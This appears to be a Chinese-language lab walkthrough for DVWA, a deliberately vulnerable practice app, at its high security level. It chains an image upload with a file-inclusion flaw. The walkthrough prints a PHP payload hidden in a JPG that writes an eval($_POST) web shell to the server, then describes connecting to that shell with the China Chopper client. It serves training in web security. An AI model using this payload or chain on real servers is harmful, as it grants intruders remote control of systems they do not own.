环境:靶机、kali linux
一、文件包含生成shell文件
1.1 原理:
- 在DVWA高级别安全的文件上传实验里,只允许上传固定格式的文件。所以我们必须将代码写到图片里即制作图片木马然后上传到服务器上。虽然也可以通过中国菜刀进行连接,但不能对文件进行操作。
- 所以结合文件包含的漏洞可以上传一个包含制作后门文件代码的图片,然后通过文件包含漏洞对此图片进行执行,执行后在服务器生成一个shell。此时我们就可以通过菜刀连接后者对服务器的文件进行任何操作。
- 这里需要注意的是,我们需要准备的图片木马是用来文件包含的,通过文件包含漏洞执行完此图片后所生成的木马文件才是我们最后真正的后门。
1.2 DVWA实验
-
制作图片木马madeshell.jpg(用于文件包含然后生成真正的木马)
图片中需要写入的代码:<?fputs(fopen("Realshell.php","w"),'<?php eval($_POST[abc]);?>')?>
此代码的含义:先看里面的内容,fopen函数为以写的方式打开一个名为RealShell.php的文件如果此文件不存在则会新建,然后fputs为在第一个参数内写入第二个参数,第二个参数即为我们要写入的代码。当此图片被解析执行后,将会生成一个RealShell.php的文件 -
将此图片上传到靶机上
-
文件包含执行此文件
在执行前我们先进入到靶机的文件包含的目录下面查看所有文件
然后执行文件包含
再查看目录,发现多出了一个shell文件,即我们创建的后门Realshell.php
-
最后我们用中国菜刀进行连接
将带有我们创建的后门文件的URL复制到菜刀中输入密码,密码即我们之前代码中所设置的